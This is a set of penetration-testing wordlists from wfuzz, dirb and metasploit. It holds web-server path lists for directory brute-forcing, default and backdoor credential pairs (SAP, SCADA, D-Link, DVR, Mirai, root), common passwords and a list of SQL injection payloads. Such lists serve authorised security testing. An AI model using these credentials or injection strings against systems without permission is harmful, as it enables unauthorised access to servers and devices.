?wp-cs-dump 3 | ?wp-html-rend 4 | ?wp-start-ver 5 | ?wp-stop-ver 6 | ?wp-uncheckout 7 | ?wp-usr-prop 8 | ?wp-ver-diff 9 | ?wp-ver-info 10 | ?wp-verify-link 11 | admin-serv 12 | admin-serv/config/admpw 13 | admpw 14 | agents 15 | bin 16 | ca 17 | ca 18 | cgi-bin 19 | config 20 | dirb_random.cgi 21 | dirb_random.jsp 22 | dirb_random.shtml 23 | docs 24 | dsgw 25 | help 26 | index.html 27 | jsp 28 | manual 29 | mc-icons 30 | netshare 31 | ns-icons 32 | publisher 33 | search 34 | search-ui 35 | servlet 36 | servlets 37 | -------------------------------------------------------------------------------- /wordlists/wfuzz/vulns/iplanet.txt: -------------------------------------------------------------------------------- 1 | ?Publisher 2 | ?wp-cs-dump 3 | ?wp-html-rend 4 | ?wp-start-ver 5 | ?wp-stop-ver 6 | ?wp-uncheckout 7 | ?wp-usr-prop 8 | ?wp-ver-diff 9 | ?wp-ver-info 10 | ?wp-verify-link 11 | admin-serv 12 | admin-serv/config/admpw 13 | admpw 14 | agents 15 | bin 16 | ca 17 | ca 18 | cgi-bin 19 | config 20 | dirb_random.cgi 21 | dirb_random.jsp 22 | dirb_random.shtml 23 | docs 24 | dsgw 25 | help 26 | index.html 27 | jsp 28 | manual 29 | mc-icons 30 | netshare 31 | ns-icons 32 | publisher 33 | search 34 | search-ui 35 | servlet 36 | servlets 37 | -------------------------------------------------------------------------------- /wordlists/wfuzz/vulns/frontpage.txt: -------------------------------------------------------------------------------- 1 | .htaccess 2 | QUERYHIT.HTM 3 | Search 4 | _fpclass 5 | _private 6 | _vti_adm 7 | _vti_aut 8 | _vti_bin 9 | _vti_cnf 10 | _vti_inf.html 11 | _vti_log 12 | _vti_pvt 13 | _vti_script 14 | _vti_txt 15 | admin.dll 16 | admin.exe 17 | administrators.pwd 18 | author.dll 19 | author.exe 20 | author.log 21 | authors.pwd 22 | cgi-bin 23 | default.htm 24 | frontpg.ini 25 | iisadmin 26 | isadmin 27 | logo.gif 28 | owssvr.dll 29 | queryhit.htm 30 | samples 31 | search 32 | service.grp 33 | service.pwd 34 | shtml.exe 35 | srchadm 36 | users.pwd 37 | vti_inf.html 38 | -------------------------------------------------------------------------------- /wordlists/metasploit/dlink_telnet_backdoor_userpass.txt: -------------------------------------------------------------------------------- 1 | Alphanetworks wrgg19_c_dlwbr_dir300 2 | Alphanetworks wrgn49_dlob_dir600b 3 | Alphanetworks wrgn23_dlwbr_dir600b 4 | Alphanetworks wrgn22_dlwbr_dir615 5 | Alphanetworks wrgnd08_dlob_dir815 6 | Alphanetworks wrgg15_di524 7 | Alphanetworks wrgn39_dlob.hans_dir645 8 | Alphanetworks wapnd03cm_dkbs_dap2555 9 | Alphanetworks wapnd04cm_dkbs_dap3525 10 | Alphanetworks wapnd15_dlob_dap1522b 11 | Alphanetworks wrgac01_dlob.hans_dir865 12 | Alphanetworks wrgn23_dlwbr_dir300b 13 | Alphanetworks wrgn28_dlob_dir412 14 | Alphanetworks wrgn39_dlob.hans_dir645_V1 15 | -------------------------------------------------------------------------------- /wordlists/metasploit/sap_default.txt: -------------------------------------------------------------------------------- 1 | SAP* 06071992 2 | SAP* PASS 3 | DDIC 19920706 4 | DDIC Welcome01 5 | SAPCPIC ADMIN 6 | EARLYWATCH SUPPORT 7 | TMSADM PASSWORD 8 | TMSADM ADMIN 9 | TMSADM $1Pawd2& 10 | ADMIN welcome 11 | ADSUSER ch4ngeme 12 | ADS_AGENT ch4ngeme 13 | DEVELOPER ch4ngeme 14 | J2EE_ADMIN ch4ngeme 15 | SAPJSF ch4ngeme 16 | SAPR3 SAP 17 | CTB_ADMIN sap123 18 | XMI_DEMO sap123 19 | IDEADM admin 20 | SMD_ADMIN init1234 21 | SMD_BI_RFC init1234 22 | SMD_RFC init1234 23 | SOLMAN_ADMIN init1234 24 | SOLMAN_BTC init1234 25 | SAPSUPPORT init1234 26 | CONTENTSERV init1234 27 | SMD_AGT init1234 28 | -------------------------------------------------------------------------------- /wordlists/wfuzz/others/common_pass.txt: -------------------------------------------------------------------------------- 1 | 2 | 123456 3 | 1234567 4 | 12345678 5 | 123asdf 6 | Admin 7 | admin 8 | administrator 9 | asdf123 10 | backup 11 | backupexec 12 | changeme 13 | clustadm 14 | cluster 15 | compaq 16 | default 17 | dell 18 | dmz 19 | domino 20 | exchadm 21 | exchange 22 | ftp 23 | gateway 24 | guest 25 | lotus 26 | money 27 | notes 28 | office 29 | oracle 30 | pass 31 | password 32 | password! 33 | password1 34 | print 35 | qwerty 36 | replicate 37 | seagate 38 | secret 39 | sql 40 | sqlexec 41 | temp 42 | temp! 43 | temp123 44 | test 45 | test! 46 | test123 47 | tivoli 48 | veritas 49 | virus 50 | web 51 | www 52 | KKKKKKK -------------------------------------------------------------------------------- /wordlists/wfuzz/webservices/ws-dirs.txt: -------------------------------------------------------------------------------- 1 | ServiceDefinition 2 | admin 3 | atom 4 | axis 5 | context 6 | default 7 | disco 8 | extwsdl 9 | index 10 | inquire 11 | inquiryapi 12 | inspection 13 | interface 14 | interfaces 15 | jboss-net 16 | jbossws 17 | juddi 18 | manual 19 | methods 20 | name 21 | names 22 | operation 23 | operations 24 | oracle 25 | proxy 26 | publish 27 | publishing 28 | query 29 | rss 30 | service 31 | services 32 | svce 33 | uddi 34 | uddiexplorer 35 | uddigui 36 | uddilistener 37 | uddisoap 38 | webservice 39 | webserviceclient 40 | webserviceclient+ssl 41 | webservices 42 | ws 43 | ws4ee 44 | wsatom 45 | wsdl 46 | wsgw 47 | wsil 48 | xmethods 49 | -------------------------------------------------------------------------------- /wordlists/dirb/stress/alphanum_case_extra.txt: -------------------------------------------------------------------------------- 1 | ! 2 | " 3 | # 4 | $ 5 | % 6 | & 7 | ' 8 | ( 9 | ) 10 | * 11 | + 12 | , 13 | - 14 | . 15 | / 16 | 0 17 | 1 18 | 2 19 | 3 20 | 4 21 | 5 22 | 6 23 | 7 24 | 8 25 | 9 26 | : 27 | ; 28 | < 29 | = 30 | > 31 | ? 32 | @ 33 | A 34 | B 35 | C 36 | D 37 | E 38 | F 39 | G 40 | H 41 | I 42 | J 43 | K 44 | L 45 | M 46 | N 47 | O 48 | P 49 | Q 50 | R 51 | S 52 | T 53 | U 54 | V 55 | W 56 | X 57 | Y 58 | Z 59 | [ 60 | \ 61 | ] 62 | ^ 63 | _ 64 | ` 65 | a 66 | b 67 | c 68 | d 69 | e 70 | f 71 | g 72 | h 73 | i 74 | j 75 | k 76 | l 77 | m 78 | n 79 | o 80 | p 81 | q 82 | r 83 | s 84 | t 85 | u 86 | v 87 | w 88 | x 89 | y 90 | z 91 | { 92 | | 93 | } 94 | ~ 95 | 96 | -------------------------------------------------------------------------------- /wordlists/wfuzz/stress/alphanum_case_extra.txt: -------------------------------------------------------------------------------- 1 | ! 2 | " 3 | # 4 | $ 5 | % 6 | & 7 | ' 8 | ( 9 | ) 10 | * 11 | + 12 | , 13 | - 14 | . 15 | / 16 | 0 17 | 1 18 | 2 19 | 3 20 | 4 21 | 5 22 | 6 23 | 7 24 | 8 25 | 9 26 | : 27 | ; 28 | < 29 | = 30 | > 31 | ? 32 | @ 33 | A 34 | B 35 | C 36 | D 37 | E 38 | F 39 | G 40 | H 41 | I 42 | J 43 | K 44 | L 45 | M 46 | N 47 | O 48 | P 49 | Q 50 | R 51 | S 52 | T 53 | U 54 | V 55 | W 56 | X 57 | Y 58 | Z 59 | [ 60 | \ 61 | ] 62 | ^ 63 | _ 64 | ` 65 | a 66 | b 67 | c 68 | d 69 | e 70 | f 71 | g 72 | h 73 | i 74 | j 75 | k 76 | l 77 | m 78 | n 79 | o 80 | p 81 | q 82 | r 83 | s 84 | t 85 | u 86 | v 87 | w 88 | x 89 | y 90 | z 91 | { 92 | | 93 | } 94 | ~ 95 | 96 | -------------------------------------------------------------------------------- /wordlists/metasploit/multi_vendor_cctv_dvr_pass.txt: -------------------------------------------------------------------------------- 1 | 1111 2 | 1234 3 | 2222 4 | 3333 5 | 4444 6 | 5555 7 | 6666 8 | 7777 9 | 8888 10 | 9999 11 | 0000 12 | 4321 13 | 3477 14 | 5897 15 | 12345 16 | 12341 17 | 123456 18 | 1234567 19 | 12345678 20 | 12341234 21 | 44444 22 | 11111 23 | 111111 24 | 1111111 25 | 11111111 26 | 22222222 27 | 33333333 28 | 44444444 29 | 55555555 30 | 66666666 31 | 77777777 32 | 88888888 33 | 99999999 34 | 00000000 35 | 0000000 36 | 000000 37 | 00000 38 | 000 39 | 00 40 | 0 41 | 09090 42 | 7772000 43 | 666666 44 | 24343 45 | 111 46 | 123 47 | 12 48 | 11 49 | 1 50 | 2 51 | 3 52 | 4 53 | 5 54 | 6 55 | 7 56 | 8 57 | 9 58 | 0 59 | aa 60 | dvr2580222 61 | abc123 62 | pass 63 | password 64 | admin 65 | administrator 66 | root 67 | -------------------------------------------------------------------------------- /wordlists/dirb/vulns/frontpage.txt: -------------------------------------------------------------------------------- 1 | .htaccess 2 | QUERYHIT.HTM 3 | Search 4 | _fpclass 5 | _private 6 | _vti_adm 7 | _vti_aut 8 | _vti_bin 9 | _vti_bin/_vti_adm/admin.dll 10 | _vti_bin/_vti_adm/fpadmdll.dll 11 | _vti_bin/_vti_aut/author.dll 12 | _vti_bin/owssvr.dll 13 | _vti_bin/shtml.dll 14 | _vti_cnf 15 | _vti_inf.html 16 | _vti_inf.html 17 | _vti_log 18 | _vti_pvt 19 | _vti_txt 20 | admin.dll 21 | admin.exe 22 | administrators.pwd 23 | author.dll 24 | author.exe 25 | author.log 26 | authors.pwd 27 | cgi-bin 28 | default.htm 29 | fpadmdll.dll 30 | frontpg.ini 31 | iisadmin 32 | isadmin 33 | logo.gif 34 | owssvr.dll 35 | queryhit.htm 36 | samples 37 | search 38 | service.grp 39 | service.pwd 40 | shtml.dll 41 | shtml.exe 42 | srchadm 43 | users.pwd 44 | -------------------------------------------------------------------------------- /wordlists/dirb/vulns/netware.txt: -------------------------------------------------------------------------------- 1 | Aplicaciones 2 | EHS.Web 3 | Exchange 4 | ICHAIN 5 | ICHAINErrors 6 | ICHAINLogout 7 | ICS 8 | ICSIBroker 9 | ICSLogin 10 | NSearch 11 | NetStorage 12 | Portal 13 | SearchServlet 14 | apache 15 | aplicaciones 16 | bo 17 | eGuide 18 | eMFrame 19 | ed 20 | edgecgi 21 | edirectory 22 | eg 23 | eguide 24 | eis 25 | exteND 26 | extend 27 | fullpageservic 28 | home.html 29 | iFolder 30 | iManager 31 | ifolder 32 | im 33 | imanager 34 | index.html 35 | intranet 36 | iprint 37 | ndk 38 | ned 39 | nps 40 | nsadmin 41 | nsure 42 | oneNet 43 | pg 44 | portal 45 | portalservice 46 | principal 47 | quickfinder 48 | r3d 49 | service 50 | servlet 51 | site 52 | sms 53 | tomcat 54 | update 55 | vo 56 | voffice 57 | webacc 58 | webgui 59 | welcome 60 | wgate 61 | -------------------------------------------------------------------------------- /wordlists/dirb/vulns/iis.txt: -------------------------------------------------------------------------------- 1 | Micros~1 2 | WebSer~1 3 | _mem_bin 4 | _private 5 | _vti_adm 6 | _vti_aut 7 | _vti_bin 8 | _vti_cnf 9 | _vti_log 10 | _vti_pvt 11 | _vti_script 12 | _vti_txt 13 | administration 14 | adsamples 15 | archiv~1 16 | asp 17 | aspnet_client 18 | asps 19 | bin 20 | bins 21 | cgi-bin 22 | cmsample 23 | common 24 | common~1 25 | db 26 | fpsample 27 | help 28 | iisadmin 29 | iisadmpwd 30 | iishelp 31 | iissamples 32 | images 33 | inetpub 34 | inetsrv 35 | isapi 36 | msadc 37 | pbserver 38 | printers 39 | progra~1 40 | samples 41 | scripts 42 | scripts 43 | scripts/samples 44 | scripts/tools 45 | sites 46 | siteserver 47 | system 48 | system_web 49 | web 50 | webpub 51 | winnt 52 | wwwroot 53 | x.cfm 54 | x.htx 55 | x.ida 56 | x.idc 57 | x.idq 58 | x.pl 59 | x.shtml 60 | -------------------------------------------------------------------------------- /wordlists/wfuzz/vulns/iis.txt: -------------------------------------------------------------------------------- 1 | Micros~1 2 | WebSer~1 3 | _mem_bin 4 | _private 5 | _vti_adm 6 | _vti_aut 7 | _vti_bin 8 | _vti_cnf 9 | _vti_log 10 | _vti_pvt 11 | _vti_script 12 | _vti_txt 13 | administration 14 | adsamples 15 | archiv~1 16 | asp 17 | aspnet_client 18 | asps 19 | bin 20 | bins 21 | cgi-bin 22 | cmsample 23 | common 24 | common~1 25 | db 26 | fpsample 27 | help 28 | iisadmin 29 | iisadmpwd 30 | iishelp 31 | iissamples 32 | images 33 | inetpub 34 | inetsrv 35 | isapi 36 | msadc 37 | pbserver 38 | printers 39 | progra~1 40 | samples 41 | scripts 42 | scripts 43 | scripts/samples 44 | scripts/tools 45 | sites 46 | siteserver 47 | system 48 | system_web 49 | web 50 | webpub 51 | winnt 52 | wwwroot 53 | x.cfm 54 | x.htx 55 | x.ida 56 | x.idc 57 | x.idq 58 | x.pl 59 | x.shtml 60 | -------------------------------------------------------------------------------- /wordlists/wfuzz/vulns/sql_inj.txt: -------------------------------------------------------------------------------- 1 | ' 2 | --ora_sqls 3 | #mysql 4 | '#mysql 5 | and 1=1 6 | and USER=USER 7 | and user()=user() 8 | and 2=0 9 | or 2=2 10 | ' and '2'='2 11 | ' and '2'='0 12 | ' or '2'='2 13 | /*ora_mysql*/and/**/2=2 14 | /*ora_mysql*/and/**/2=0 15 | '/*ora_mysql*/and/**/'2'='2 16 | '/*ora_mysql*/and/**/'2'='0 17 | '/*ora_mysql*/or/**/'2'='2 18 | and 2=2#mysql 19 | and 2=0#mysql 20 | and 2=2-- oracle_mysql 21 | and 2=0-- oracle_mysql 22 | ' and '2'='2'#mysql 23 | ' and '2'='0'#mysql 24 | ' and '2'='2'-- oracle 25 | ' and '2'='0'-- oracle 26 | 999999999999999999 27 | 1e100 28 | 2 or 2=2 29 | 2' or '2'='2 30 | order by 1-- 31 | admin'-- 32 | admin' 33 | 'test 34 | 'test-- 35 | ' or 1=1-- 36 | or 1=1-- 37 | or 1=1 38 | or 1=1# 39 | " or 1=1# 40 | admin'# 41 | now() 42 | 43 | -------------------------------------------------------------------------------- /wordlists/dirb/vulns/coldfusion.txt: -------------------------------------------------------------------------------- 1 | CFIDE 2 | CFIDE/administrator 3 | CFIDE/administrator/aboutcf.cfm 4 | CFIDE/administrator/Application.cfm 5 | CFIDE/administrator/checkfile.cfm 6 | CFIDE/administrator/enter.cfm 7 | CFIDE/administrator/header.cfm 8 | CFIDE/administrator/homefile.cfm 9 | CFIDE/administrator/homepage.cfm 10 | CFIDE/administrator/index.cfm 11 | CFIDE/administrator/left.cfm 12 | CFIDE/administrator/linkdirect.cfm 13 | CFIDE/administrator/login.cfm 14 | CFIDE/administrator/logout.cfm 15 | CFIDE/administrator/navserver.cfm 16 | CFIDE/administrator/right.cfm 17 | CFIDE/administrator/tabs.cfm 18 | CFIDE/administrator/welcome.cfm 19 | CFIDE/administrator/welcomedoc.cfm 20 | CFIDE/administrator/welcomeexapps.cfm 21 | CFIDE/administrator/welcomefooter.cfm 22 | CFIDE/administrator/welcomegetstart.cfm -------------------------------------------------------------------------------- /wordlists/wfuzz/vulns/coldfusion.txt: -------------------------------------------------------------------------------- 1 | CFIDE 2 | CFIDE/administrator 3 | CFIDE/administrator/aboutcf.cfm 4 | CFIDE/administrator/Application.cfm 5 | CFIDE/administrator/checkfile.cfm 6 | CFIDE/administrator/enter.cfm 7 | CFIDE/administrator/header.cfm 8 | CFIDE/administrator/homefile.cfm 9 | CFIDE/administrator/homepage.cfm 10 | CFIDE/administrator/index.cfm 11 | CFIDE/administrator/left.cfm 12 | CFIDE/administrator/linkdirect.cfm 13 | CFIDE/administrator/login.cfm 14 | CFIDE/administrator/logout.cfm 15 | CFIDE/administrator/navserver.cfm 16 | CFIDE/administrator/right.cfm 17 | CFIDE/administrator/tabs.cfm 18 | CFIDE/administrator/welcome.cfm 19 | CFIDE/administrator/welcomedoc.cfm 20 | CFIDE/administrator/welcomeexapps.cfm 21 | CFIDE/administrator/welcomefooter.cfm 22 | CFIDE/administrator/welcomegetstart.cfm -------------------------------------------------------------------------------- /wordlists/metasploit/av-update-urls.txt: -------------------------------------------------------------------------------- 1 | www.es-web.sophos.com 2 | www.es-web.sophos.com.edgesuite.net 3 | www.es-web-2.sophos.com 4 | www.es-web-2.sophos.com.edgesuite.net 5 | www.dnl-01.geo.kaspersky.com 6 | www.downloads2.kaspersky-labs.com 7 | www.liveupdate.symantecliveupdate.com 8 | www.liveupdate.symantec.com 9 | www.update.symantec.com 10 | www.update.nai.com 11 | www.download797.avast.com 12 | www.guru.avg.com 13 | www.osce8-p.activeupdate.trendmicro.com 14 | www.forefrontdl.microsoft.com 15 | es-web.sophos.com 16 | es-web.sophos.com.edgesuite.net 17 | es-web-2.sophos.com 18 | es-web-2.sophos.com.edgesuite.net 19 | dnl-01.geo.kaspersky.com 20 | downloads2.kaspersky-labs.com 21 | liveupdate.symantecliveupdate.com 22 | liveupdate.symantec.com 23 | update.symantec.com 24 | update.nai.com 25 | download797.avast.com 26 | guru.avg.com 27 | osce8-p.activeupdate.trendmicro.com 28 | forefrontdl.microsoft.com 29 | -------------------------------------------------------------------------------- /wordlists/dirb/vulns/vignette.txt: -------------------------------------------------------------------------------- 1 | 0,,,00 2 | 0,,,00.html 3 | 1,,,00 4 | 1,,,00.html 5 | CDA 6 | CDS 7 | CMA 8 | CMS 9 | Deleting 10 | Docs 11 | Editing 12 | HOME 13 | Images 14 | Internal 15 | MetaDataUpdate 16 | Report 17 | Select 18 | StoryServer 19 | TMT 20 | VGN 21 | XML 22 | ac 23 | allvars 24 | asp 25 | aspstatus 26 | cda 27 | cds 28 | cma 29 | cms 30 | controller 31 | diag 32 | docs 33 | edit 34 | error 35 | errorpage 36 | errors 37 | executequery 38 | external 39 | home 40 | ibm 41 | initialize 42 | internal 43 | jsp 44 | jspstatus 45 | jsptest 46 | legacy 47 | license 48 | listcolumns 49 | login 50 | loginlogo 51 | logo 52 | main 53 | menu 54 | metadataupdate 55 | performance 56 | portal 57 | ppstats 58 | preview 59 | previewer 60 | record 61 | reset 62 | save 63 | stat 64 | status 65 | storyserver 66 | style 67 | stylepreviewer 68 | utils 69 | vdc 70 | vgn 71 | vr 72 | Ping.jsp 73 | HelloWorld.jsp 74 | 75 | -------------------------------------------------------------------------------- /wordlists/metasploit/root_userpass.txt: -------------------------------------------------------------------------------- 1 | root 2 | root !root 3 | root Cisco 4 | root NeXT 5 | root QNX 6 | root admin 7 | root attack 8 | root ax400 9 | root bagabu 10 | root blablabla 11 | root blender 12 | root brightmail 13 | root calvin 14 | root changeme 15 | root changethis 16 | root default 17 | root fibranne 18 | root honey 19 | root jstwo 20 | root kn1TG7psLu 21 | root letacla 22 | root mpegvideo 23 | root nsi 24 | root par0t 25 | root pass 26 | root password 27 | root pixmet2003 28 | root resumix 29 | root root 30 | root rootme 31 | root rootpass 32 | root t00lk1t 33 | root tini 34 | root toor 35 | root trendimsa1.0 36 | root tslinux 37 | root uClinux 38 | root vertex25 39 | root owaspbwa 40 | root permit 41 | root ascend 42 | root ROOT500 43 | root cms500 44 | root fivranne 45 | root davox 46 | root letmein 47 | root powerapp 48 | root dbps 49 | root ibm 50 | root monitor 51 | root turnkey 52 | root vagrant 53 | -------------------------------------------------------------------------------- /wordlists/wfuzz/vulns/vignette.txt: -------------------------------------------------------------------------------- 1 | 0,,,00 2 | 0,,,00.html 3 | 1,,,00 4 | 1,,,00.html 5 | CDA 6 | CDS 7 | CMA 8 | CMS 9 | Deleting 10 | Docs 11 | Editing 12 | HOME 13 | Images 14 | Internal 15 | MetaDataUpdate 16 | Report 17 | Select 18 | StoryServer 19 | TMT 20 | VGN 21 | XML 22 | ac 23 | allvars 24 | asp 25 | aspstatus 26 | cda 27 | cds 28 | cma 29 | cms 30 | controller 31 | diag 32 | docs 33 | edit 34 | error 35 | errorpage 36 | errors 37 | executequery 38 | external 39 | home 40 | ibm 41 | initialize 42 | internal 43 | jsp 44 | jspstatus 45 | jsptest 46 | legacy 47 | license 48 | listcolumns 49 | login 50 | loginlogo 51 | logo 52 | main 53 | menu 54 | metadataupdate 55 | performance 56 | portal 57 | ppstats 58 | preview 59 | previewer 60 | record 61 | reset 62 | save 63 | stat 64 | status 65 | storyserver 66 | style 67 | stylepreviewer 68 | utils 69 | vdc 70 | vgn 71 | vr 72 | Ping.jsp 73 | HelloWorld.jsp 74 | 75 | -------------------------------------------------------------------------------- /wordlists/wfuzz/vulns/fatwire.txt: -------------------------------------------------------------------------------- 1 | servlet/HelloCS 2 | servlet/ContentServer 3 | servlet/Satellite 4 | servlet/CatalogManager 5 | servlet/BlobServer 6 | servlet/TreeManager 7 | servlet/CookieServer 8 | servlet/CacheServer 9 | servlet/EvalServer 10 | servlet/DebugServer 11 | servlet/FlushServer 12 | servlet/SeedDispatchServer 13 | servlet/Inventory 14 | servlet/SyncSeedDispatchServer 15 | servlet/PageDispatchServer 16 | servlet/DispatchManager 17 | servlet 18 | HelloCS 19 | ContentServer 20 | Satellite 21 | CatalogManager 22 | BlobServer 23 | TreeManager 24 | CookieServer 25 | CacheServer 26 | EvalServer 27 | DebugServer 28 | FlushServer 29 | SeedDispatchServer 30 | Inventory 31 | SyncSeedDispatchServer 32 | PageDispatchServer 33 | DispatchManager 34 | Xcelerate/Admin/LoginPage.html 35 | Xcelerate 36 | Admin 37 | LoginPage 38 | LoginPage.html 39 | Xcelerate/LoginPage.html 40 | futuretense_cs/adminforms.html 41 | futuretense_cs 42 | adminforms 43 | adminforms.html 44 | futuretense 45 | openmarket 46 | fatwire 47 | divine 48 | contentserver 49 | xcelerate 50 | assetmaker 51 | -------------------------------------------------------------------------------- /wordlists/metasploit/mirai_user_pass.txt: -------------------------------------------------------------------------------- 1 | root xc3511 2 | root vizxv 3 | root admin 4 | admin admin 5 | root 888888 6 | root xmhdipc 7 | root default 8 | root juantech 9 | root 123456 10 | root 54321 11 | support support 12 | root 13 | admin password 14 | root root 15 | root 12345 16 | user user 17 | admin 18 | root pass 19 | admin admin1234 20 | root 1111 21 | admin smcadmin 22 | admin 1111 23 | root 666666 24 | root password 25 | root 1234 26 | root klv123 27 | Administrator admin 28 | service service 29 | supervisor supervisor 30 | guest guest 31 | guest 12345 32 | admin1 password 33 | administrator 1234 34 | 666666 666666 35 | 888888 888888 36 | ubnt ubnt 37 | root klv1234 38 | root Zte521 39 | root hi3518 40 | root jvbzd 41 | root anko 42 | root zlxx. 43 | root 7ujMko0vizxv 44 | root 7ujMko0admin 45 | root system 46 | root ikwb 47 | root dreambox 48 | root user 49 | root realtek 50 | root 00000000 51 | admin 1111111 52 | admin 1234 53 | admin 12345 54 | admin 54321 55 | admin 123456 56 | admin 7ujMko0admin 57 | admin pass 58 | admin meinsm 59 | tech tech 60 | mother fucker 61 | -------------------------------------------------------------------------------- /wordlists/metasploit/scada_default_userpass.txt: -------------------------------------------------------------------------------- 1 | adm adm 2 | admin 1234 3 | admin !admin 4 | admin admin 5 | admin avocent 6 | admin bintec 7 | admin default 8 | admin funwerk 9 | Admin Keep 10 | admin password 11 | admin private 12 | admin root 13 | admin wago 14 | admin westermo 15 | Administrator admin 16 | administrator administrator 17 | Administrator deltav 18 | Administrator Gateway 19 | administrator ml1400 20 | Administrator Password 21 | Basisk Basisk 22 | CENTUM CENTUM 23 | def trade 24 | DMUser Data&Pass 25 | Engineer 400 26 | guest guest 27 | ilon ilon 28 | Liebert Liebert 29 | LOI 1000ppps ppps 30 | ntpupdate ntpupdate 31 | qbf77101 hexakisoctahedron 32 | root admin 33 | root dbps 34 | root dreambox 35 | root linux 36 | root rkwjsdusrnth 37 | root root 38 | root wago 39 | sconsole 12345 40 | service ABB800xA 41 | siemens siemens 42 | su ko2003wa 43 | superview superview 44 | SYSTEM 666666 45 | tridium niagara 46 | user 12345 47 | user admin 48 | user passwd 49 | user public 50 | user user 51 | user user00 52 | username password 53 | winccd winccpass 54 | wincce winccpass 55 | wsupgrade wsupgrade 56 | -------------------------------------------------------------------------------- /wordlists/dirb/vulns/sunas.txt: -------------------------------------------------------------------------------- 1 | ias-samples 2 | ias-samples/index.html 3 | index.html 4 | cgi-bin 5 | cgi-bin/gx.cgi 6 | cgi-bin/gx.dll 7 | cgi-bin/gx.exe 8 | gx 9 | gx.cgi 10 | gx.exe 11 | GXApp 12 | GXApp/index.html 13 | GXApp/COnlineBank 14 | GXApp/COnlineBank/COBLogin.html 15 | GXApp/CSample 16 | GXApp/CSample/index.html 17 | GXApp/images 18 | GXApp/OnlineBank 19 | GXApp/OnlineBank/OBLogin.html 20 | fortune 21 | NASApp/fortune/fortune 22 | lotery 23 | COnlineBank 24 | CSample 25 | OnlineBank 26 | NASApp 27 | NASApp/system 28 | NASApp/system/ValidationError.jsp 29 | NASApp/system/ExceptionThrown.jsp 30 | NASApp/system/JSPRunner 31 | NASApp/system/JSPRunnerSticky 32 | NASApp/system/SessionInvalidator 33 | NASApp/system/StaticServlet 34 | NASApp/system/WelcomeListServlet 35 | NASApp/system/FormAuthServlet 36 | NASApp/system/CertAuthServlet 37 | NASApp/system/BasicAuthServlet 38 | system 39 | ValidationError.jsp 40 | ExceptionThrown.jsp 41 | JSPRunner 42 | JSPRunnerSticky 43 | SessionInvalidator 44 | StaticServlet 45 | WelcomeListServlet 46 | FormAuthServlet 47 | CertAuthServlet 48 | BasicAuthServlet 49 | com.netscape.server.servlet.jsp.JSPRunner 50 | servlet 51 | classes 52 | 53 | -------------------------------------------------------------------------------- /wordlists/wfuzz/vulns/sunas.txt: -------------------------------------------------------------------------------- 1 | ias-samples 2 | ias-samples/index.html 3 | index.html 4 | cgi-bin 5 | cgi-bin/gx.cgi 6 | cgi-bin/gx.dll 7 | cgi-bin/gx.exe 8 | gx 9 | gx.cgi 10 | gx.exe 11 | GXApp 12 | GXApp/index.html 13 | GXApp/COnlineBank 14 | GXApp/COnlineBank/COBLogin.html 15 | GXApp/CSample 16 | GXApp/CSample/index.html 17 | GXApp/images 18 | GXApp/OnlineBank 19 | GXApp/OnlineBank/OBLogin.html 20 | fortune 21 | NASApp/fortune/fortune 22 | lotery 23 | COnlineBank 24 | CSample 25 | OnlineBank 26 | NASApp 27 | NASApp/system 28 | NASApp/system/ValidationError.jsp 29 | NASApp/system/ExceptionThrown.jsp 30 | NASApp/system/JSPRunner 31 | NASApp/system/JSPRunnerSticky 32 | NASApp/system/SessionInvalidator 33 | NASApp/system/StaticServlet 34 | NASApp/system/WelcomeListServlet 35 | NASApp/system/FormAuthServlet 36 | NASApp/system/CertAuthServlet 37 | NASApp/system/BasicAuthServlet 38 | system 39 | ValidationError.jsp 40 | ExceptionThrown.jsp 41 | JSPRunner 42 | JSPRunnerSticky 43 | SessionInvalidator 44 | StaticServlet 45 | WelcomeListServlet 46 | FormAuthServlet 47 | CertAuthServlet 48 | BasicAuthServlet 49 | com.netscape.server.servlet.jsp.JSPRunner 50 | servlet 51 | classes 52 | 53 | -------------------------------------------------------------------------------- /wordlists/metasploit/adobe_top100_pass.txt: -------------------------------------------------------------------------------- 1 | 123456 2 | 123456789 3 | password 4 | adobe123 5 | 12345678 6 | qwerty 7 | 1234567 8 | 111111 9 | photoshop 10 | 123123 11 | 1234567890 12 | 000000 13 | abc123 14 | 1234 15 | adobe1 16 | macromedia 17 | azerty 18 | iloveyou 19 | aaaaaa 20 | 654321 21 | 12345 22 | 666666 23 | sunshine 24 | 123321 25 | letmein 26 | monkey 27 | asdfgh 28 | password1 29 | shadow 30 | princess 31 | dragon 32 | adobeadobe 33 | daniel 34 | computer 35 | michael 36 | 121212 37 | charlie 38 | master 39 | superman 40 | qwertyuiop 41 | 112233 42 | asdfasdf 43 | jessica 44 | 1q2w3e4r 45 | welcome 46 | 1qaz2wsx 47 | 987654321 48 | fdsa 49 | 753951 50 | chocolate 51 | fuckyou 52 | soccer 53 | tigger 54 | asdasd 55 | thomas 56 | asdfghjkl 57 | internet 58 | michelle 59 | football 60 | 123qwe 61 | zxcvbnm 62 | dreamweaver 63 | 7777777 64 | maggie 65 | qazwsx 66 | baseball 67 | jennifer 68 | jordan 69 | abcd1234 70 | trustno1 71 | buster 72 | 555555 73 | liverpool 74 | abc 75 | whatever 76 | 11111111 77 | 102030 78 | 123123123 79 | andrea 80 | pepper 81 | nicole 82 | killer 83 | abcdef 84 | hannah 85 | test 86 | alexander 87 | andrew 88 | 222222 89 | joshua 90 | freedom 91 | samsung 92 | asdfghj 93 | purple 94 | ginger 95 | 123654 96 | matrix 97 | secret 98 | summer 99 | 1q2w3e 100 | snoopy1 101 | -------------------------------------------------------------------------------- /wordlists/metasploit/unix_users.txt: -------------------------------------------------------------------------------- 1 | 2 | 4Dgifts 3 | EZsetup 4 | OutOfBox 5 | ROOT 6 | adm 7 | admin 8 | administrator 9 | anon 10 | auditor 11 | avahi 12 | avahi-autoipd 13 | backup 14 | bbs 15 | bin 16 | checkfs 17 | checkfsys 18 | checksys 19 | chronos 20 | cmwlogin 21 | couchdb 22 | daemon 23 | dbadmin 24 | demo 25 | demos 26 | diag 27 | distccd 28 | dni 29 | fal 30 | fax 31 | ftp 32 | games 33 | gdm 34 | gnats 35 | gopher 36 | gropher 37 | guest 38 | haldaemon 39 | halt 40 | hplip 41 | informix 42 | install 43 | irc 44 | karaf 45 | kernoops 46 | libuuid 47 | list 48 | listen 49 | lp 50 | lpadm 51 | lpadmin 52 | lynx 53 | mail 54 | man 55 | me 56 | messagebus 57 | mountfs 58 | mountfsys 59 | mountsys 60 | news 61 | noaccess 62 | nobody 63 | nobody4 64 | nuucp 65 | nxpgsql 66 | operator 67 | oracle 68 | pi 69 | popr 70 | postgres 71 | postmaster 72 | printer 